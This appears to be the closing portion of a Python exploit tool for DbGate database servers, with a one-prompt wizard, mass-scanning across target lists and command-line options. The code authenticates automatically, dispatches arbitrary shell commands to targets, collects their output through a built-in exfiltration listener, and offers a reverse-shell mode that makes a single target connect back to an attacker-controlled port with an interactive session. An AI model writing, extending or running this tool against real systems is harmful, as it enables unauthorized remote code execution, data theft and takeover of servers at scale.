self.timeout: float = DEFAULT_TIMEOUT
self.verify_ssl: bool = False
self.async_exec: bool = False
self.b64_exfil: bool = True
self.wait_exfil: float = 8.0
self.use_callback: bool = True
self.callback_url: Optional[str] = None
self.listen_bind: str = "0.0.0.0"
self.listen_port: int = DEFAULT_CALLBACK_PORT
self.callback_host: str = ""
self.use_builtin_listener: bool = True
self.resolved_targets: List[str] = []
self.target_commands: Dict[str, str] = {}
self.reverse_shell: bool = False
self.revsh_lhost: str = ""
self.revsh_lport: int = DEFAULT_REVSH_PORT
self.revsh_bind: str = "0.0.0.0"
self.wait_revsh: float = 15.0
self.revsh_interactive: bool = False
self.mass_wait_exfil: float = 8.0
def detect_target_input(raw: str) -> Tuple[str, str, str]:
"""Return (mode, target, optional_command)."""
raw = raw.strip()
cmd = ""
if not raw:
return "single", "http://127.0.0.1:3000", ""
if "|" in raw:
raw, _, cmd = raw.partition("|")
raw = raw.strip()
cmd = cmd.strip()
if raw.startswith("@"):
raw = raw[1:].strip()
looks_like_file = (
os.path.isfile(raw)
or (not re.match(r"^https?://", raw, re.I) and raw.endswith(".txt"))
)
if looks_like_file:
return "mass", raw, cmd
return "single", raw, cmd
def apply_auto_defaults(cfg: RunConfig) -> None:
"""Fill everything automatically — no extra questions."""
cfg.login_body = {"amoid": "none"}
cfg.token = None
cfg.default_port = DEFAULT_PORT
cfg.timeout = DEFAULT_TIMEOUT
cfg.verify_ssl = False
cfg.vector = "both"
cfg.check_only = False
cfg.command = "id"
cfg.async_exec = False
cfg.b64_exfil = True
cfg.wait_exfil = 8.0
cfg.use_callback = True
cfg.use_builtin_listener = True
cfg.listen_bind = "0.0.0.0"
cfg.listen_port = DEFAULT_CALLBACK_PORT
cfg.callback_host = guess_lan_ip()
cfg.callback_url = build_callback_url(cfg.callback_host, cfg.listen_port)
cfg.threads = DEFAULT_CONCURRENCY
cfg.mass_wait_exfil = 8.0
def print_auto_summary(cfg: RunConfig) -> None:
print()
log_info("AUTO configuration")
if cfg.mode == "mass":
log_info(f" Mode : mass file={cfg.targets_file}")
log_info(f" Threads : {cfg.threads}")
else:
log_info(f" Mode : single target={cfg.url}")
log_info(f" Auth : POST /auth/login → Bearer (automatic)")
log_info(f" Command : {cfg.command}")
log_info(f" Vector : {cfg.vector}")
log_info(f" Callback : {cfg.callback_url}")
log_info(f" Listener : {cfg.listen_bind}:{cfg.listen_port}")
print()
def run_wizard() -> RunConfig:
show_banner()
log_info("AUTO — one question (optional: URL|command e.g. http://ip:3000|ls -la)")
raw = ask("Target URL or list.txt", "http://127.0.0.1:3000")
cfg = RunConfig()
mode, target, opt_cmd = detect_target_input(raw)
cfg.mode = mode
if mode == "mass":
cfg.targets_file = target
if not os.path.isfile(cfg.targets_file):
log_fail(f"List file not found: {cfg.targets_file}")
sys.exit(1)
else:
cfg.url = ensure_target_url(target, DEFAULT_PORT)
apply_auto_defaults(cfg)
if opt_cmd:
cfg.command = opt_cmd
print_auto_summary(cfg)
return cfg
async def preflight_verify(cfg: RunConfig) -> bool:
"""Verify environment before any exploit attempt — abort if critical checks fail."""
log_info("═══ Preflight verification ═══")
init_nx_output()
if cfg.mode == "mass":
if not os.path.isfile(cfg.targets_file):
log_fail(f"List file missing: {cfg.targets_file}")
return False
urls, per_cmds, stats, errors = load_targets_smart(
cfg.targets_file, cfg.default_port
)
write_list_report(
cfg.targets_file, stats, urls, errors,
default_port=cfg.default_port, per_cmds=per_cmds,
)
cfg.resolved_targets = urls
cfg.target_commands = per_cmds
if per_cmds:
log_info(f"Per-target commands: {len(per_cmds)} line(s) with |command")
log_info(
f"List: raw={stats.raw} resolved={stats.resolved} "
f"dup={stats.dup} invalid={stats.invalid} → {OUT_LIST_REPORT}"
)
if stats.resolved == 0:
log_fail("No valid targets after parsing list — fix list_report.txt")
return False
if stats.invalid > 0:
log_warn(f"{stats.invalid} invalid lines — see {OUT_LIST_REPORT}")
else:
if not cfg.url:
log_fail("No target URL")
return False
cfg.resolved_targets = [cfg.url]
log_info(f"Target normalized: {cfg.url}")
if cfg.reverse_shell and not cfg.check_only:
log_info(
f"Revsh: target should connect to {cfg.revsh_lhost}:{cfg.revsh_lport} "
f"(listener bind {cfg.revsh_bind})"
)
if cfg.mode != "single":
log_fail("--reverse-shell supports single target (-u) only")
return False
if cfg.use_callback and not cfg.check_only and not cfg.reverse_shell:
if cfg.callback_host in ("127.0.0.1", "localhost"):
tgt = cfg.url or (cfg.resolved_targets[0] if cfg.resolved_targets else "")
if tgt and "127.0.0.1" not in tgt and "localhost" not in tgt:
log_warn(
"Callback host is localhost but target looks remote — "
"exfil may fail; set LAN IP in --callback-host"
)
if cfg.mode == "single" and cfg.url and not cfg.token:
log_info("Preflight: testing target reachability + auto-login...")
if not await prefetch_token(cfg):
log_fail("Preflight failed: cannot reach target or obtain token")
return False
log_ok("Preflight passed — starting scan")
print()
return True
async def prefetch_token(cfg: RunConfig) -> bool:
"""Fetch Bearer token before scan (single target) so user sees it succeeded."""
if cfg.token or not cfg.url:
return True
login_body = cfg.login_body or {"amoid": "none"}
client = DbGateExploit(
cfg.url,
timeout=cfg.timeout,
verify_ssl=cfg.verify_ssl,
login_body=login_body,
)
connector = aiohttp.TCPConnector(ssl=cfg.verify_ssl, limit=1)
async with aiohttp.ClientSession(connector=connector) as session:
if not await client.probe_alive(session):
log_fail(f"[{client.tag}] cannot reach target for login")
return False
if not await client.obtain_token(session):
return False
cfg.token = client.token
return True
def write_session_summary(cfg: RunConfig, stats: Dict[str, int]) -> None:
doc = {
"session": SESSION_ID,
"mode": cfg.mode,
"command": cfg.command,
"vector": cfg.vector,
"callback": cfg.callback_url,
"reverse_shell": cfg.reverse_shell,
"revsh_lhost": cfg.revsh_lhost,
"revsh_lport": cfg.revsh_lport,
"targets": cfg.resolved_targets,
"stats": stats,
"output_dir": os.path.abspath(OUT_DIR),
}
try:
with open(OUT_SUMMARY, "w", encoding="utf-8") as fh:
json.dump(doc, fh, indent=2)
log_info(f"Summary → {OUT_SUMMARY}")
except OSError:
pass
async def run_from_config(cfg: RunConfig) -> None:
if not await preflight_verify(cfg):
sys.exit(1)
exfil_srv: Optional[HTTPServer] = None
revsh_listener: Optional[TcpRevshListener] = None
callback_url = cfg.callback_url
if cfg.reverse_shell and not cfg.check_only:
if cfg.mode != "single":
log_fail("--reverse-shell: use -u for one target only")
sys.exit(1)
try:
revsh_listener = TcpRevshListener(cfg.revsh_bind, cfg.revsh_lport)
actual_revsh_port = revsh_listener.start()
cfg.revsh_lport = actual_revsh_port
cfg.command = build_reverse_shell_cmd(cfg.revsh_lhost, actual_revsh_port)
log_ok(
f"Revsh dial address (from target): "
f"{cfg.revsh_lhost}:{actual_revsh_port}"
)
except OSError as exc:
log_fail(f"Cannot start reverse-shell listener: {exc}")
sys.exit(1)
if (
cfg.use_builtin_listener
and cfg.use_callback
and not cfg.check_only
and not cfg.reverse_shell
):
try:
exfil_srv, actual_port = start_exfil_server(
cfg.listen_bind, cfg.listen_port
)
cfg.listen_port = actual_port
callback_url = build_callback_url(
cfg.callback_host or guess_lan_ip(), actual_port
)
cfg.callback_url = callback_url
log_ok(f"Callback URL (target must reach this): {callback_url}")
log_info(f"Listener bind: {cfg.listen_bind}:{actual_port}")
except OSError as exc:
log_fail(f"Cannot start exfil listener: {exc}")
sys.exit(1)
command = "" if cfg.check_only else cfg.command
if cfg.mode == "single":
client = DbGateExploit(
cfg.url,
timeout=cfg.timeout,
verify_ssl=cfg.verify_ssl,
token=cfg.token,
login_body=cfg.login_body,
)
result = await client.full_chain(
command=command,
callback_url=callback_url if cfg.use_callback else None,
vector=cfg.vector,
check_only=cfg.check_only,
async_exec=cfg.async_exec or cfg.reverse_shell,
b64_exfil=cfg.b64_exfil,
wait_exfil=cfg.wait_exfil,
use_reverse_shell=cfg.reverse_shell,
wait_revsh=cfg.wait_revsh,
revsh_listener=revsh_listener,
revsh_interactive=cfg.revsh_interactive,
)
stats: Dict[str, int] = {
"exfil": 0, "dispatch": 0, "vuln": 0, "fail": 0, "revsh": 0,
}
stats[result] = stats.get(result, 0) + 1
write_session_summary(cfg, stats)
log_ok(f"Final result: {result.upper()} — {describe_result(result)}")
if result == "exfil":
log_ok(f"Per-target exfil → {nx_exfil_path(cfg.url)}")
elif result == "revsh":
if cfg.revsh_interactive:
log_ok("Reverse TCP session ended — see Nx/revsh.txt")
else:
log_ok(
"Reverse TCP verified (connection only) — see Nx/revsh.txt; "
"add --revsh-interactive or use: nc -lvnp PORT"
)
elif result == "dispatch":
if cfg.reverse_shell:
log_warn(
"Not confirmed: no TCP reverse connection. "
"Use an IP reachable from DbGate (Docker: host gateway, not 127.0.0.1)."
)
else:
log_warn(
"Not confirmed: runner accepted the job but no output hit the listener. "
"Try --callback-host with an IP reachable from the DbGate container."
)
if revsh_listener:
revsh_listener.close()
return
targets = cfg.resolved_targets
if not cfg.check_only and cfg.use_callback and not callback_url:
log_warn("Mass mode without callback — blind dispatch only")
log_info(
f"Mass scan: {len(targets)} targets threads={cfg.threads} "
f"vector={cfg.vector}"
)
stats = await mass_scan(
targets,
command,
callback_url if cfg.use_callback else None,
cfg.vector,
cfg.check_only,
max(1, min(cfg.threads, 200)),
cfg.timeout,
cfg.verify_ssl,
cfg.token,
cfg.login_body,
cfg.async_exec,
cfg.b64_exfil,
cfg.wait_exfil if len(targets) == 1 else cfg.mass_wait_exfil,
cfg.target_commands,
)
print(Fore.MAGENTA + "─" * 80 + Style.RESET_ALL)
log_ok(
f"Done EXFIL={stats.get('exfil', 0)} DISPATCH={stats.get('dispatch', 0)} "
f"VULN={stats.get('vuln', 0)} FAIL={stats.get('fail', 0)}"
)
log_ok(f"Results in {os.path.abspath(OUT_DIR)}/")
write_session_summary(cfg, stats)
if exfil_srv:
try:
exfil_srv.shutdown()
except Exception:
pass
if revsh_listener:
revsh_listener.close()
# ── optional CLI mode (--cli) ─────────────────────────────────────────────────
def build_arg_parser() -> argparse.ArgumentParser:
p = argparse.ArgumentParser(description="DbGate assessment — use without --cli for wizard")
p.add_argument("--cli", action="store_true", help="Use command-line flags instead of wizard")
p.add_argument("-u", "--url")
p.add_argument("-f", "--file", default=DEFAULT_TARGETS)
p.add_argument("-c", "--callback")
p.add_argument("--cmd", "--command", dest="command", default="id")
p.add_argument("--check-only", action="store_true")
p.add_argument("--vector", choices=DbGateExploit.VECTORS, default="functionName")
p.add_argument("--token")
p.add_argument("--login-json", default='{"amoid":"none"}')
p.add_argument("-t", "--threads", type=int, default=DEFAULT_CONCURRENCY)
p.add_argument("--timeout", type=float, default=DEFAULT_TIMEOUT)
p.add_argument("--port", type=int, default=DEFAULT_PORT)
p.add_argument("--listen-host", default="0.0.0.0")
p.add_argument("--listen-port", type=int, default=DEFAULT_CALLBACK_PORT)
p.add_argument("--callback-host", help="IP/hostname targets use to reach your listener")
p.add_argument("--async-exec", action="store_true")
p.add_argument("--no-b64", action="store_true")
p.add_argument("--wait-exfil", type=float, default=8.0)
p.add_argument(
"--reverse-shell",
nargs="?",
const="AUTO",
metavar="LHOST:LPORT",
help="TCP reverse shell (single -u only). Default: guessed LAN IP:4444",
)
p.add_argument(
"--revsh-bind",
default="0.0.0.0",
help="Local bind address for reverse-shell listener",
)
p.add_argument(
"--revsh-port",
type=int,
default=DEFAULT_REVSH_PORT,
help="Local port when --reverse-shell has no LHOST:LPORT (default 4444)",
)
p.add_argument(
"--wait-revsh",
type=float,
default=15.0,
help="Seconds to wait for reverse TCP after dispatch",
)
p.add_argument(
"--revsh-interactive",
action="store_true",
help="After reverse TCP connect, relay stdin/stdout (basic; nc is better for TTY)",
)
p.add_argument(
"--mass-wait-exfil",
type=float,
default=8.0,
help="Per-target exfil wait in mass mode (default 8s; was capped at 3s)",
)
p.add_argument("--secure", action="store_true", help="Enable TLS certificate verification")
return p
async def run_from_cli(args: argparse.Namespace) -> None:
login_body, err = parse_login_json(args.login_json)
if err:
log_fail(err)
sys.exit(1)
cfg = RunConfig()
cfg.mode = "single" if args.url else "mass"
cfg.url = ensure_target_url(args.url, args.port) if args.url else ""
cfg.targets_file = args.file
cfg.default_port = args.port
cfg.check_only = args.check_only
cfg.command = args.command
cfg.vector = args.vector
cfg.token = args.token
cfg.login_body = login_body
cfg.threads = args.threads
cfg.timeout = args.timeout
cfg.verify_ssl = args.secure
cfg.async_exec = args.async_exec
cfg.b64_exfil = not args.no_b64
cfg.wait_exfil = args.wait_exfil
cfg.mass_wait_exfil = args.mass_wait_exfil
revsh_requested = args.reverse_shell is not None
if revsh_requested:
if not args.url:
log_fail("--reverse-shell requires a single target: -u http://host:3000")
sys.exit(1)
if args.check_only:
log_fail("--reverse-shell cannot be used with --check-only")
sys.exit(1)
try:
lhost, lport = parse_revsh_endpoint(args.reverse_shell, args.revsh_port)
except (ValueError, OSError) as exc:
log_fail(f"Invalid --reverse-shell endpoint: {exc}")
sys.exit(1)
cfg.reverse_shell = True
cfg.revsh_lhost = args.callback_host or lhost
cfg.revsh_lport = lport
cfg.revsh_bind = args.revsh_bind
cfg.wait_revsh = args.wait_revsh
cfg.revsh_interactive = args.revsh_interactive
cfg.use_callback = False
cfg.use_builtin_listener = False
cfg.async_exec = True
cfg.command = "" # built after listener bind in run_from_config
log_info(f"Reverse shell mode → target dials {cfg.revsh_lhost}:{cfg.revsh_lport}")
else:
cfg.use_callback = bool(args.callback) or (
not args.check_only and bool(args.command)
)
cfg.callback_url = args.callback
cfg.listen_bind = args.listen_host
cfg.listen_port = args.listen_port
cfg.use_builtin_listener = not args.callback and not args.check_only
if cfg.use_builtin_listener and not args.callback:
cfg.callback_host = args.callback_host or guess_lan_ip()
if not cfg.callback_url:
cfg.callback_url = build_callback_url(
cfg.callback_host, cfg.listen_port
)
await run_from_config(cfg)
async def async_main() -> None:
parser = build_arg_parser()
args = parser.parse_args()
if args.cli:
show_banner()
await run_from_cli(args)
else:
cfg = run_wizard()
await run_from_config(cfg)
def main() -> None:
try:
asyncio.run(async_main())
except KeyboardInterrupt:
print()
log_warn("Interrupted")
if __name__ == "__main__":
main()